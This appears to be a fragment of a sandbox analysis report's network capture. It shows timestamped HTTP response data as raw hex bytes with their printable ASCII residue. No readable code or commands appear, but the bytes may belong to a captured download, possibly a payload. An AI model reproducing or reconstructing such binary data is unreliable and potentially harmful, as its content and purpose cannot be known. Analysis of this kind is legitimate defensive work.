                                                                                                                                                            2022-09-29 12:45:22 UTC30812INData Raw: b1 02 3e ff e5 03 45 8b 09 43 e5 72 01 68 db 44 99 c2 09 20 c3 47 dd d0 50 23 ee d2 97 e8 7c 58 93 98 94 3b ba 78 50 53 ac 63 fe 0d d5 d7 45 64 33 0b e8 e3 63 50 90 ec c4 bc 93 b2 27 e6 8b 89 49 8d 6e c8 67 f2 22 b0 58 75 c8 ac d8 7f 82 35 26 07 bd 51 f5 49 8d 2f da 25 9a f1 15 f0 d7 43 03 71 48 f8 b6 24 c9 2a af 67 38 e7 2e 9c d6 3b a5 36 01 e5 33 f1 d0 ff dc 98 9e 69 51 97 61 af 41 66 fd ce f7 88 04 d3 25 0c c5 d7 88 5e 89 d0 6c 48 92 c3 7f 46 bc de aa eb 9c b1 c2 a4 47 90 65 cc 54 5d 5a 7a 59 33 34 6f d5 32 08 c7 ba 76 00 46 b3 29 d6 7f de 00 62 3f 61 c4 16 82 ba cb 84 cf be 6a 6b e3 f3 87 3b 6c 27 ed f8 12 f6 5b cb 51 0c c6 f8 c1 0c b0 b2 40 35 eb d2 a0 94 d2 1a 2b 55 2c 44 f2 1c 12 ec 35 5c 09 f5 a6 ba e6 ff 8a 64 34 d6 6d 3e bc 31 09 6c 80 93 1c ba
                                                                                                                                                            Data Ascii: >ECrhD GP#|X;xPScEd3cP'Ing"Xu5&QI/%CqH$*g8.;63iQaAf%^lHFGeT]ZzY34o2vF)b?ajk;l'[Q@5+U,D5\d4m>1l
                                                                                                                                                            2022-09-29 12:45:22 UTC30828INData Raw: 3d a2 c3 72 06 7b 69 85 67 39 f5 6c 6a b6 a6 12 cf 05 f5 56 25 2a 1a 25 4c b9 f4 44 61 6c 08 25 0c 76 65 7f 7e 17 20 a1 f9 98 b7 e9 31 c3 fc 2d 6d 55 c7 87 ca d3 51 05 b3 a5 0c eb 87 12 a0 86 c9 8b 15 df 3f 38 0b c9 57 df 6a a3 fb 57 82 f6 27 62 cc 2a 9c a7 93 33 9f bc c3 e4 88 a0 e3 38 a5 de b9 d2 94 09 c0 46 39 9e a3 1b 38 51 9e 78 51 c1 33 9a f7 20 95 d6 7d 29 7c 89 4f b2 21 1e 13 7c f4 ff dc 2c 64 00 1b 32 74 2b 8a c4 e0 03 a1 ee 90 f0 d7 bb 87 36 53 1a 65 f0 d7 5c 9c e5 c4 05 66 d0 49 fa 6a 59 53 3c 70 a4 91 40 82 10 5d 3b 35 be aa 5b 36 c6 fd 94 bc af 12 9b c9 cf a1 53 e9 14 93 f0 71 b1 89 02 85 16 99 74 aa 69 bc 42 01 31 05 be e3 7e 9f 80 af 2b 0f 0f 44 f1 87 a1 c7 3e 9d 7f 43 c1 d3 87 12 c4 5d ac 4c 30 2f e7 9a 98 9b d2 05 8f 40 37 4a 9a 1e b4 95
                                                                                                                                                            Data Ascii: =r{ig9ljV%*%LDal%ve~ 1-mUQ?8WjW'b*38F98QxQ3 })|O!|,d2t+6Se\fIjYS<p@];5[6SqtiB1~+D>C]L0/@7J
                                                                                                                                                            2022-09-29 12:45:22 UTC30844INData Raw: 0a f8 0d cc 49 80 bc 61 55 08 d7 c1 b4 94 1e bf be 67 5a d4 51 c0 01 e5 d5 10 3a a3 6b 4d ea 10 de 8e 4f e3 c1 77 2a d3 33 6b 33 a9 c5 9f 07 0d 60 a1 2d 2b 13 59 bf 58 48 57 b9 c2 6b 98 2f f7 e1 52 e8 ea 00 cc 86 6b da 4f 6b 60 61 c2 9b 47 68 7e 60 28 0e 5e 5d d0 4e 7d 76 bf ab e0 e5 0f 22 6d fd c8 a0 1f 23 e1 a2 1c 25 cb 21 52 6b 90 2a 5a 9f e3 7f 64 8c e0 7e 7d 3f 95 4b f1 d7 cf 7d a5 9f 7c 64 62 a1 ff 6b b9 db e0 2c df fb 82 dd 4b 2d 47 11 99 18 6d d0 cf ad 6e f8 35 86 95 34 7f e9 bd 57 bf a4 7c 58 56 83 c7 19 d9 1a 87 21 f9 a1 80 61 f3 f2 a2 9b 41 ac 71 78 58 f7 f1 6a 19 98 05 45 57 05 86 27 c9 f5 1f 36 e7 1f 66 d7 76 1b cd 62 3e 99 af 20 bf 71 a9 ca 7a 2c ca bc 92 96 20 4a a4 ba 3d 36 77 0e 30 80 b0 8e 91 74 dd 5e 11 6e b8 03 a4 38 d1 8e d0 bf 15 c7
                                                                                                                                                            Data Ascii: IaUgZQ:kMOw*3k3`-+YXHWk/RkOk`aGh~`(^]N}v"m#%!Rk*Zd~}?K}|dbk,K-Gmn54W|XV!aAqxXjEW'6fvb> qz, J=6w0t^n8
                                                                                                                                                            2022-09-29 12:45:22 UTC30860INData Raw: 75 37 31 fb dc 50 37 42 0b 5f 99 85 2e 63 2b 78 02 5c 83 19 9b fc 98 3c f1 2d 5f 8c f9 d0 5d d2 dc 5e 84 60 ef d1 02 1f 04 cc 61 b2 37 6f f8 14 0c e3 e7 af 07 bb 79 9e e3 23 60 c9 9a a9 f8 a5 4c 2c 86 3d 4a 19 f4 23 d1 79 e6 bd 47 52 a2 46 08 f4 b5 ae be a4 43 b9 73 cf 89 4f 3b 8b 4b 5c 81 14 64 d4 e7 3e 4a 2b 9d f8 a2 70 d0 ff 10 e9 c5 4a 91 db 78 ba 90 04 29 1d 8a 88 8e c0 6e 1b 69 f1 31 7d 28 28 81 6e 72 c6 7f 6f c5 1c a0 5d b4 14 a3 29 c8 01 aa 2c c2 ee c8 2b 8d 9d 4a 93 be b5 1f c8 3f 19 a3 d7 c2 88 09 53 f1 f9 cd f5 fe 31 36 fb cd 94 ba 13 95 a5 6f 01 b8 01 67 7a 8e 58 47 32 77 35 9c 7b d8 6e 86 a3 69 03 2e 7a 6d 88 1c 33 e4 22 77 ea e5 24 d8 4c 8c 8c 70 d5 14 8a 44 c0 9c 3f d1 11 7e 3b 29 a0 83 3b 9b 0c 98 db 93 8e d1 5a d0 f4 21 ae 09 bf 2c b5 9a
                                                                                                                                                            Data Ascii: u71P7B_.c+x\<-_]^`a7oy#`L,=J#yGRFCsO;K\d>J+pJx)ni1}((nro]),+J?S16ogzXG2w5{ni.zm3"w$LpD?~;);Z!,
                                                                                                                                                            2022-09-29 12:45:22 UTC30876INData Raw: c4 e7 bd ea 1a 57 b5 62 a9 52 b6 9f 08 54 a8 9c e4 91 7e 99 1a 6d d6 b6 fb c2 fd be 6a 52 9f e6 d5 4b 42 55 87 17 9e d6 fd 06 6a e4 ac 82 54 85 d4 22 8a e4 94 b1 94 0e c7 88 43 d7 19 fb ed 57 b7 f1 98 5c a1 07 c9 e8 b8 18 f7 3e 38 1f df d7 1f da 5d 77 a9 44 b7 6a 37 2b ab 26 94 6b 65 93 23 18 dd 5c bc bb 5b 0e 05 6f ce 78 b9 3f 27 04 10 7d 68 15 26 f6 13 26 90 46 ca 4f 97 c2 66 50 7e c4 70 79 1c 1e a5 02 28 6f 64 25 06 ad 8e 40 94 79 c2 19 06 e3 91 71 cb cd c0 6b 0d 3b 99 e3 32 d3 bc 42 f9 41 22 3c 44 6f 0b d3 df 34 72 2b 3c bc 03 3d 9e e7 00 bf e1 95 0e 83 de ef 9f d7 2a 61 76 1c f8 95 df 45 df ef 05 ac b2 b2 1a b8 05 7e bd ce fd c2 1c fe 31 04 b2 3b da a3 a3 35 af 4b c6 97 b7 4d 57 78 60 25 ed c1 4a 1f 5d f2 88 e9 f6 ff 00 2a 1c d9 2d 40 03 d2 6d ed 3a
                                                                                                                                                            Data Ascii: WbRT~mjRKBUjT"CW\>8]wDj7+&ke#\[ox?'}h&&FOfP~py(od%@yqk;2BA"<Do4r+<=*avE~1;5KMWx`%J]*-@m:
                                                                                                                                                            2022-09-29 12:45:22 UTC30892INData Raw: 18 6b a2 ee 7e 0e fc 69 3b 06 f7 c0 56 6e 85 d7 b1 e4 50 44 12 25 37 b7 e3 49 d2 35 30 6f fb 15 cc 90 19 ea b6 24 fa f7 bb 40 07 92 fb 4f 96 4b 08 8c 30 80 f1 d3 c9 ab 2e 2d ab d9 e1 c7 dd 0b 44 cf 1b 63 bb 53 02 bc 55 53 cc c0 77 be 68 b6 bf 71 4c 94 b8 69 2f b9 02 cd a3 3c 81 36 5f 81 81 75 d5 d9 3e ea 74 c3 41 a4 9b 26 69 e3 f5 c8 47 8a 4a 5c b5 7e dc 1b 84 81 a6 70 14 1a 91 98 ad ae 77 a4 9a 7a 4f 44 32 29 bb 5f 78 f9 f8 e8 27 85 10 8c ed 2c b6 62 26 bf 97 aa 59 b5 25 29 1f 1b 78 8a 89 1f 5c be 42 fd 2d 82 f3 1f a2 a2 a7 44 67 6a 5e e5 53 e8 46 c6 bd 1a 7e 02 4b 7f e1 80 ed 97 3e e4 f3 c0 c2 a4 7e 7e 1a 0a 00 f2 98 9b cf d0 f3 1d a4 f1 5e 5a 93 f6 ee 77 03 3d b5 1f 24 2d 33 d0 3d 0a 81 dc e1 9b 22 48 42 92 e7 d7 62 fc 1c eb b9 9b 9b fb 07 b6 98 ea 57
                                                                                                                                                            Data Ascii: k~i;VnPD%7I50o$@OK0.-DcSUSwhqLi/<6_u>tA&iGJ\~pwzOD2)_x',b&Y%)x\B-Dgj^SF~K>~~^Zw=$-3="HBbW
                                                                                                                                                            2022-09-29 12:45:22 UTC30908INData Raw: 11 80 2d 1c 60 5a 13 04 14 bd 1c ee 23 60 96 5a 82 4a eb cd 3e ef 2a a9 8c 36 db 58 94 76 07 dd 4b 54 89 36 46 4d d1 3a ff 52 b7 34 6b 26 11 79 49 69 36 1b 70 a2 9f c3 85 5d 5c 53 74 0e 31 3a 52 d1 33 ff 3c 6b 28 9c 0f 84 a1 92 f6 30 7e 3f 34 00 92 23 7e ad 95 78 cc a5 29 6b bd 73 e0 9c 0b 86 4f 76 e4 3e 5e 26 a0 f8 a0 97 71 01 eb 43 85 ac cc dc f5 e9 ad ac 06 41 b3 6d c9 22 34 93 77 97 34 8b 37 18 91 28 d2 92 e7 5e 1b 76 ef 21 5f 48 9c f2 43 7b bd ff 57 4e 61 c3 93 35 56 52 d2 02 cd e7 40 b0 02 f0 84 62 10 93 98 ab 8c 5e 11 4d b1 ef ae f2 0b 96 bd 7c 98 3e 98 c9 20 5b a7 3e 8f 77 0b f3 01 c4 d9 99 72 cb 21 95 1e d0 f7 d4 25 02 06 4a 42 a1 3b a6 f0 ff 4f 17 0c 0c 81 bc c2 a5 f4 69 27 25 00 2e b4 d7 e8 ee 23 3c 4e 8a 4a 0d 46 c9 82 ab df 9c 01 a7 d9 f0 54
                                                                                                                                                            Data Ascii: -`Z#`ZJ>*6XvKT6FM:R4k&yIi6p]\St1:R3<k(0~?4#~x)ksOv>^&qCAm"4w47(^v!_HC{WNa5VR@b^M|> [>wr!%JB;Oi'%.#<NJFT
                                                                                                                                                            2022-09-29 12:45:22 UTC30917INData Raw: 5f 84 3b 23 4b 81 2a 26 d2 bd 24 2d 1d 17 f3 ae f3 8c 73 9b f3 0c 42 99 30 7f fd df c5 e4 9e ac 57 24 a7 75 d2 5b ae 86 8e f8 73 11 1f ab c4 72 c0 63 27 b0 2c d3 7a 3a 17 a6 b5 f6 f3 95 dd 23 11 c7 41 f9 f5 d3 6b 7b 7a bd 04 d5 1a 49 dc 35 42 e1 a8 62 55 fc be 10 92 0e 76 24 d5 a7 ab 6c db 34 1a ea b0 ef 95 c3 b9 83 96 7b 16 d6 37 8c 2d 9c 95 28 6e 9e 92 09 bf 44 82 2e 5e 51 f5 a4 f2 b4 c6 65 82 3f 61 c6 f9 29 d7 e8 4e 85 06 e3 13 bd 13 bd 6f e4 44 39 01 10 2e 4f 23 c0 41 f6 47 46 a9 d6 18 da b6 29 4a e2 cf b9 74 d1 da 03 72 4f b0 f5 93 5f 17 8d cd ac 3c 8a a7 94 a3 64 58 04 4c 9c ff c7 d4 d1 08 3e bb 23 dc 35 11 c4 43 3c 30 87 4e 20 7f 43 b6 6f 91 1c 01 30 b6 a5 e6 42 23 03 9a dd 86 b4 10 6c 2e 9f 7f 8b 63 73 39 b3 4e b1 ef 12 2d 07 5c e1 f8 c8 da 60 21
                                                                                                                                                            Data Ascii: _;#K*&$-sB0W$u[src',z:#Ak{zI5BbUv$l4{7-(nD.^Qe?a)NoD9.O#AGF)JtrO_<dXL>#5C<0N Co0B#l.cs9N-\`!
                                                                                                                                                            2022-09-29 12:45:22 UTC30933INData Raw: 53 5e 38 b6 45 0d 26 7c 00 30 be 69 48 ca 8a d5 37 dc 41 07 7f 8c 4f 73 30 9e a5 92 77 21 6f 3f 2c d3 28 d3 ba d5 24 8e 17 99 1e 39 8f 2b 1b 54 56 39 b2 de 56 c0 8f 76 6e eb 82 89 f2 5e 74 76 67 cc fb 29 58 29 69 b5 9d a1 b0 d2 a2 ee 6a 84 18 79 af 19 df b8 f5 76 35 5b cd 7a 8a 91 82 63 66 2f 96 a2 0e e0 e6 af e1 0c aa 2f f4 6a 07 88 55 c0 6f 5b f1 ee 38 db e9 ca e8 e1 0e b0 29 5c 59 ca e1 4c ae da e0 69 a8 0d ec af 2f 12 69 42 ca 07 8b b9 b0 24 60 8f e7 c4 99 66 17 18 8a 77 04 0b 9e a3 67 59 a5 b4 56 b9 08 dc 6c 04 7c 0b 18 f1 9c 7c 2c 25 ed b8 b9 a7 05 13 ae 30 99 aa a7 77 3c 23 28 c6 2e 28 a6 5a d6 56 e1 f1 ff 3e 4e c0 31 43 71 4b f9 77 fa cb c7 a3 61 ca 10 f4 db 60 34 55 18 59 29 9f a1 d5 a8 f8 2e 90 ba a8 31 ba 7e fd 80 35 2e 95 07 0c 38 25 ff 99 bd
                                                                                                                                                            Data Ascii: S^8E&|0iH7AOs0w!o?,($9+TV9Vvn^tvg)X)ijyv5[zcf//jUo[8)\YLi/iB$`fwgYVl||,%0w<#(.(ZV>N1CqKwa`4UY).1~5.8%
                                                                                                                                                            2022-09-29 12:45:22 UTC30949INData Raw: d8 78 ac e4 82 a8 0d 7f 91 b2 43 3a c0 9c 1c a7 1e 8b fb 28 f8 9f aa af cc 5f 54 55 44 db 33 5c 66 22 db 8f db 68 14 4e 4f c9 da 05 94 77 64 a3 8c dd 79 58 5f 10 11 02 5b b5 6c 6c 95 44 4b 99 ea cc c6 eb cb 52 8d f1 5c 06 b3 a8 89 b9 65 47 7c dd da 30 1f 5b ac dd aa 89 43 b4 2e f1 ef e3 d7 24 70 46 f7 c2 62 18 18 49 e0 91 ba 9f 38 b7 dc 7e e6 59 ec dd fd c6 cf 76 bd 7c 2a be 22 7b 49 b3 b5 19 d7 33 54 ed e7 a0 eb f1 8c 17 3a 95 02 4a 51 95 10 c5 d7 3b d1 a9 d3 06 03 58 11 29 9c 6e 6d 33 72 91 a8 c5 f7 d6 a2 06 94 e7 47 dc 29 f1 05 da 4f 8f 4c db 55 1d e7 40 13 75 27 0b 15 44 32 84 6e 32 5b b3 23 b0 0d 22 11 5b dd 6d 7c dd d7 03 8a a1 ae 39 71 63 80 86 23 a8 09 96 5d 05 07 5f 18 b1 e3 e6 1b 06 ad 32 f2 55 ae 97 07 01 11 b7 bb 25 c8 73 de 89 3a 18 67 37 fa
                                                                                                                                                            Data Ascii: xC:(_TUD3\f"hNOwdyX_[llDKR\eG|0[C.$pFbI8~Yv|*"{I3T:JQ;X)nm3rG)OLU@u'D2n2[#"[m|9qc#]_2U%s:g7
                                                                                                                                                            2022-09-29 12:45:22 UTC30965INData Raw: 9e a4 23 34 cf 20 ad b9 4a a8 00 8a c1 c3 15 5a 42 7a 1d 06 a8 ff 2f ac 4a 30 03 0d a5 d7 07 8e ab b8 c9 8c 36 78 d7 9b 42 e8 97 71 31 08 18 54 74 10 af 06 fb 06 dc 41 2a 23 a7 f7 a4 23 c4 cd 08 fc f4 62 cc f0 cd a9 b4 9a 78 49 cf 96 8a 43 aa 53 99 c4 33 15 ab 1f e6 44 71 dc 89 b3 7b 86 56 18 a2 bc a6 9b 33 32 93 16 0a 7b 63 b8 44 08 d9 be 21 59 65 64 d9 76 79 67 68 a8 41 af e1 27 aa de ae 46 ea be be 9d 52 f9 50 aa 8b 47 48 45 2d f4 f6 15 17 8d 0c e8 68 5a 99 36 dc d0 8d e9 1f 30 7b 3c b6 84 93 c9 82 41 a9 ce a4 08 5b dc 9a 21 38 00 04 a9 dc 2c dc da ae a9 4b 73 28 4e b9 ab 9e f1 43 f7 20 26 cc 0d 78 fe 23 2b c5 03 d6 85 42 87 b8 50 be 55 b2 83 0b 2d 3d 22 f1 1e 2d 9c 50 1f cd 22 19 26 08 b1 a3 2f 9f 19 05 0c 10 6c 33 51 a6 c3 9b 1e ff e6 01 65 c2 5c 8e
                                                                                                                                                            Data Ascii: #4 JZBz/J06xBq1TtA*##bxICS3Dq{V32{cD!YedvyghA'FRPGHE-hZ60{<A[!8,Ks(NC &x#+BPU-="-P"&/l3Qe\
                                                                                                                                                            2022-09-29 12:45:22 UTC30981INData Raw: 54 0f f7 28 af 67 d9 93 2e e6 8d b5 b9 6b 5b b4 af 41 68 d4 12 f1 1f 44 1c e1 52 25 15 cf 58 b1 a3 8c c9 5d 15 7d f0 c9 b5 25 47 12 02 f7 03 97 1a f0 d5 ae de 35 ed 19 e6 eb ca 0b cc 3d 7c 40 64 64 f5 54 ee e9 02 92 24 42 69 7a e1 3a 35 49 7a df 22 98 b7 fa b9 05 b3 25 d8 27 38 6f 4f 4d bd 46 0b 56 24 e8 39 a2 07 5c 31 81 ec 39 49 66 34 8f b8 72 ef f1 e0 7c f0 26 1b c2 e6 99 79 5f 91 9b 3f be 29 82 81 bb 11 c8 c5 d5 19 30 4f 73 1d 1d dd 3a 56 d5 c4 20 54 1a fa 35 a4 e5 a8 e0 38 e4 5d 4f da 06 5d 72 49 02 90 ed 19 de c7 ec 09 7d 08 2b e9 41 e5 b6 b0 b2 92 37 27 ff 04 42 40 fd f1 76 a6 73 d3 68 57 7b e2 58 8d e3 16 71 7a 39 fe c5 81 ee 01 f1 97 e7 0d 5e a9 93 d9 a3 e3 b1 73 ad 2b a8 61 07 2e 0f 87 3b f7 ea ab 80 55 4c 0e 8b f5 b4 9f a1 ca bc 6b c5 af c2 ff
                                                                                                                                                            Data Ascii: T(g.k[AhDR%X]}%G5=|@ddT$Biz:5Iz"%'8oOMFV$9\19If4r|&y_?)0Os:V T58]O]rI}+A7'B@vshW{Xqz9^s+a.;ULk
                                                                                                                                                            2022-09-29 12:45:22 UTC30997INData Raw: 31 37 6e 0a 67 ff b1 a4 4b 91 03 00 01 aa c0 0d 16 ec a1 27 14 f4 35 f6 91 2d a7 2c 29 d6 d9 22 a2 ce 24 d9 a4 66 8c 68 d3 73 d4 5d 78 3d bf db 1a 81 2d 65 95 62 84 e6 e7 94 23 60 72 2f 97 5a 09 9d d3 82 cd cf 9c cf 3e f1 69 10 a9 9f 54 7c 0e 79 22 57 b3 b8 60 9d 5a 82 b2 ee 8b 11 61 6f 6e 82 e7 63 45 02 56 cd 03 c8 eb 35 e2 a7 6b bb b5 bb ce 46 b8 3c 1f be eb be ca 7d 1e 58 81 ba 39 89 2a 27 eb f5 cc 31 37 90 08 9f 54 ea b3 2d 32 07 13 0f da 22 bd 5d 17 17 8c ce e4 a0 c6 4b 32 88 c4 64 d5 36 88 9d 2d 23 f1 be aa 4e 28 e4 4a 85 17 d9 fe 1e 82 05 80 f3 80 f5 60 41 9d fb c0 2e 24 ed e7 13 13 e1 5a e6 a7 f5 b3 8f 5e 21 0c fe 8f 39 27 4b 19 40 69 fe f1 11 53 c0 ae 56 e6 1a 65 4f fe 06 4d 03 3b 33 20 c0 23 35 88 5b 6a a5 3f 92 49 da 9a ec 05 7c e1 cf 6c 68 d5
                                                                                                                                                            Data Ascii: 17ngK'5-,)"$fhs]x=-eb#`r/Z>iT|y"W`ZaoncEV5kF<}X9*'17T-2"]K2d6-#N(J`A.$Z^!9'K@iSVeOM;3 #5[j?I|lh
                                                                                                                                                            2022-09-29 12:45:22 UTC31013INData Raw: c5 c6 ec a8 9c fa a9 f0 a9 b9 8e dd 66 91 21 d4 0d ab f1 44 d7 eb 6b 64 b1 3f 70 9a cd 7f 28 5d 7b 02 55 8e 67 46 12 38 eb 73 66 b6 28 36 37 ac 22 f2 32 8d 3e 30 32 26 6f 19 bf 94 4f 3f 16 bb 3e d1 fb cb e8 7f 08 5e 5a 5a b6 bb 87 ce 3f b9 60 31 57 b6 86 71 39 5c 25 c9 99 64 14 cc 38 cc ba 10 eb e9 e2 d5 6b 36 41 19 cc 34 ab f7 01 d0 19 12 8a 44 d0 f2 28 8d 7d e2 be c5 fc 3d 48 02 d9 46 b4 15 c6 65 1e d2 36 c4 0b 72 8f 36 09 6c 94 4b bb 30 09 42 54 60 46 bb f5 d6 19 06 01 ba 02 d7 34 51 62 c8 99 a9 c8 91 ab e9 a9 39 b9 4f 9f 49 a0 6d d8 60 e5 09 c8 f2 f8 75 ca 5a 3c f9 f4 69 aa 43 74 69 d7 af 09 d4 df 9b 1f 2d e6 22 a4 de 6c 70 10 4b a8 b9 63 f5 96 e6 e3 aa 83 7b a1 34 1f e9 ae 2f 90 f8 32 26 56 00 5f 25 7e 63 ed b5 2f b6 e4 ae b3 04 84 49 79 da c3 b8 8b
                                                                                                                                                            Data Ascii: f!Dkd?p(]{UgF8sf(67"2>02&oO?>^ZZ?`1Wq9\%d8k6A4D(}=HFe6r6lK0BT`F4Qb9OIm`uZ<iCti-"lpKc{4/2&V_%~c/Iy
                                                                                                                                                            2022-09-29 12:45:22 UTC31029INData Raw: ba 9a 08 8d 44 af f5 16 40 8b df 6d 1b 9a 59 00 ff 59 b7 a1 b1 e9 6a 0a be c8 f2 0f 44 01 0d 2a 1a 99 98 b7 6c 82 ec 57 60 be 42 69 3b 00 a4 39 61 20 3e 3b 3e c7 d1 39 06 aa db b3 31 e1 44 d7 19 e6 e9 51 bd c6 ad 52 e2 99 12 0b a0 e6 79 d2 1a 94 ff 9c 13 15 6a 7c 1f b5 43 a5 1e 65 1c 04 7b 22 4c 87 c8 5e b5 07 5e 9c 27 6b f0 b3 36 92 dd ca cc 1f 46 30 d1 bb 14 53 b5 91 5e b9 14 98 90 12 f6 3a 5c 86 55 49 c1 5d 2f 2e bc 97 23 c0 12 76 f6 d4 0f 9b 1f 4d db 6c 88 03 ef dc 82 9b ec e6 3b 4d 68 56 de 84 b0 e8 0a ce 81 eb 57 3b e3 a6 5d 59 98 43 f7 70 2a b8 d2 e2 66 1f b8 02 5d 60 51 16 97 16 e2 ce ee 9b d8 de 74 9a 7d c9 0f e1 34 e7 4b dc 97 22 fa 96 4b 70 d4 10 a8 64 fb 02 16 a1 12 16 24 3f a7 c9 3a 77 60 32 71 80 c2 98 95 74 b7 e4 c3 68 7e 92 48 47 93 26 97
                                                                                                                                                            Data Ascii: D@mYYjD*lW`Bi;9a >;>91DQRyj|Ce{"L^^'k6F0S^:\UI]/.#vMl;MhVW;]YCp*f]`Qt}4K"Kpd$?:w`2qth~HG&
                                                                                                                                                            2022-09-29 12:45:22 UTC31045INData Raw: 93 f9 8a ee bf 88 f1 92 ff 43 e4 06 66 6c 12 96 b7 21 9b f5 bc d5 2a 71 89 85 7a a8 69 1d a3 9c f8 23 e0 b3 1f 6c 46 07 f9 f2 d3 b2 93 30 bd 87 39 94 0b e7 96 34 3e 66 d5 e0 50 f4 02 b1 61 1f ee a8 00 7d 37 07 bb 2d 62 c1 81 0d ab e3 35 a9 ba 4e ce bf cc 83 11 8e 29 bc 25 b7 12 f6 5d 84 97 40 8d 58 19 6f 49 51 43 b3 71 44 53 22 47 21 b3 5a ca 85 da e7 44 1f af 81 a2 44 c1 18 7a c1 23 78 04 ec e6 f4 9d e5 9f b0 5e 82 6d c3 ea 5c d9 f1 5b 0d e1 0a df ad 1b b3 13 46 81 a4 cf d9 b7 60 9b 54 e8 a5 a4 0b 95 38 24 11 b6 18 95 d3 1e 04 d3 c4 05 47 1e 4b d2 27 c0 52 b4 44 0c ff 53 47 1e 50 f8 f4 10 49 f6 03 3d d9 56 ac e2 79 5c 92 61 94 73 48 99 a7 04 b9 7e bf 8d b0 b3 b5 76 a3 c2 41 30 5e 2c 03 fc 36 d4 70 6e 9b 47 47 f2 fe 59 83 fd da 4e d4 f4 12 31 a5 66 90 07
                                                                                                                                                            Data Ascii: Cfl!*qzi#lF094>fPa}7-b5N)%]@XoIQCqDS"G!ZDDz#x^m\[F`T8$GK'RDSGPI=Vy\asH~vA0^,6pnGGYN1f
                                                                                                                                                            2022-09-29 12:45:22 UTC31061INData Raw: 88 64 da fc 56 d5 aa 08 71 c4 f2 d6 ee fb 78 5b ab 50 07 3a 0e 08 c9 c8 a7 e5 d7 f8 62 9d fc 2e 73 ab b6 91 cb 30 54 b4 07 93 bd 84 57 e2 65 7a d1 94 39 44 97 cd e0 da 13 e7 83 9e 1c f9 10 ed 2c e8 9a 06 0c a1 e8 a2 18 d0 a2 e0 50 29 68 60 57 23 ae 7b f2 91 17 7a 04 d5 db da dc d0 d0 c1 ed 44 e2 94 f1 34 6b fa 17 09 ed db c4 31 3c 62 44 2e a3 04 7f a3 0e c3 57 4a 42 57 1d 76 7b aa 91 f7 ad 84 42 e1 ad 84 c2 6c 03 80 7e 92 1f 45 52 30 1a db fd a1 02 d5 56 45 d0 09 d0 ea 51 66 7c c4 4d 51 d6 15 da 6a 17 1c a9 ca f9 c4 04 5a c2 84 b1 3c 2c d9 6d fb aa 0b 88 35 d2 3f ad 41 5e ec cf 16 41 a6 12 ff 1a 10 97 ae 49 c5 02 9f 09 8f a5 d1 50 95 5a d7 ce 17 a1 72 f4 8c 9a 54 3a 26 f4 33 47 34 bb 73 ab 41 20 ca fb 54 66 58 ad 32 ab 10 89 e2 63 1b a3 81 8d e2 2d de b5
                                                                                                                                                            Data Ascii: dVqx[P:b.s0TWez9D,P)h`W#{zD4k1<bD.WJBWv{Bl~ER0VEQf|MQjZ<,m5?A^AIPZrT:&3G4sA TfX2c-
                                                                                                                                                            2022-09-29 12:45:22 UTC31077INData Raw: c3 30 26 a7 ef d1 65 73 fa 74 d3 00 ac 4d bd 93 91 3e 71 2c 91 97 4b da 4f 6e 94 ce a6 b7 22 d3 fe a9 dd 5a 66 a5 c7 21 e0 fc a8 4c e6 d6 bb 77 8e 0d d5 e9 20 85 4d b3 a7 86 0c de 29 67 a9 97 69 24 84 e9 26 ee ca bc cd 72 4c 42 68 21 46 02 5d b7 ff 3c 76 97 3a 5f c6 57 98 80 36 51 41 78 98 cb 07 49 f3 e4 50 98 19 cb 8f 25 f2 71 6b 43 0a 9f e3 7a 98 47 f6 b8 1e 78 9f f7 f8 4b c6 49 94 03 ad c8 f9 43 5c 57 f7 cc b5 8b 0e db 26 c6 bc 93 bb 59 15 2e 23 8d 0a 09 e3 d0 9f 90 48 4e 76 9b 2c 4a 66 e2 20 d2 e1 51 cb c7 5f 4c c7 28 ac 99 4a 57 8a d6 b8 58 51 91 e1 ec 37 43 03 f4 a8 5e a3 91 15 14 e2 32 e1 2f 7a 31 21 ad 55 dc 31 68 21 68 0a 20 f3 4e 7a 2f bc a6 09 5e 62 39 29 44 01 ca 9f 7c ff 5b c1 6b 36 5b 2a 1b 99 d7 4f eb 9b 2d e4 58 58 e1 f0 be c1 98 e4 c7 c0
                                                                                                                                                            Data Ascii: 0&estM>q,KOn"Zf!Lw M)gi$&rLBh!F]<v:_W6QAxIP%qkCzGxKIC\W&Y.#HNv,Jf Q_L(JWXQ7C^2/z1!U1h!h Nz/^b9)D|[k6[*O-XX
                                                                                                                                                            2022-09-29 12:45:22 UTC31093INData Raw: 87 47 5f b7 27 7a b9 4b 88 1c 65 b5 9e dc 37 92 5c af c9 0a 99 74 af d0 5b 06 51 e5 fe c8 1e 8e 2b 36 2f 37 28 2f 77 fd cf 3c 65 a1 3a 3e 96 da 26 54 d2 be f5 64 b3 c4 e0 ac 70 20 37 61 8a 00 07 d8 d7 e9 7e 20 b0 cc a9 70 0e d2 49 c2 fc 60 96 b3 a0 77 7c cc 75 b8 d5 0c 43 9d 72 a6 9c e8 d4 d3 f2 a0 b3 4f 8c 3d 7d 6e 2e 7b f4 b0 96 e6 fe 7e 13 dc f9 4f 72 2b 41 67 84 61 cc 79 51 9d d3 27 93 a6 ac 5a 1b 6a 55 80 71 03 8c 0a 87 6e 53 24 f9 3b 57 62 a8 2a a0 49 13 cb 0f b5 17 ef dc 99 85 9e b3 53 92 b5 15 d1 02 b0 96 67 d8 94 e2 97 db cc 70 8e f7 de af aa a0 de 30 d7 20 2d e3 54 7e 9f 36 fb 2b 43 6e 91 f9 58 49 a0 dc 69 59 34 8b e4 24 1a 63 d9 53 bb bf 49 7d d5 39 d5 f8 84 8e a1 f4 16 53 12 4b 06 a1 7c 1c be 4d f7 46 78 de 3c 14 35 8d 95 d6 ae f8 95 21 2c 45
                                                                                                                                                            Data Ascii: G_'zKe7\t[Q+6/7(/w<e:>&Tdp 7a~ pI`w|uCrO=}n.{~Or+AgayQ'ZjUqnS$;Wb*ISgp0 -T~6+CnXIiY4$cSI}9SK|MFx<5!,E
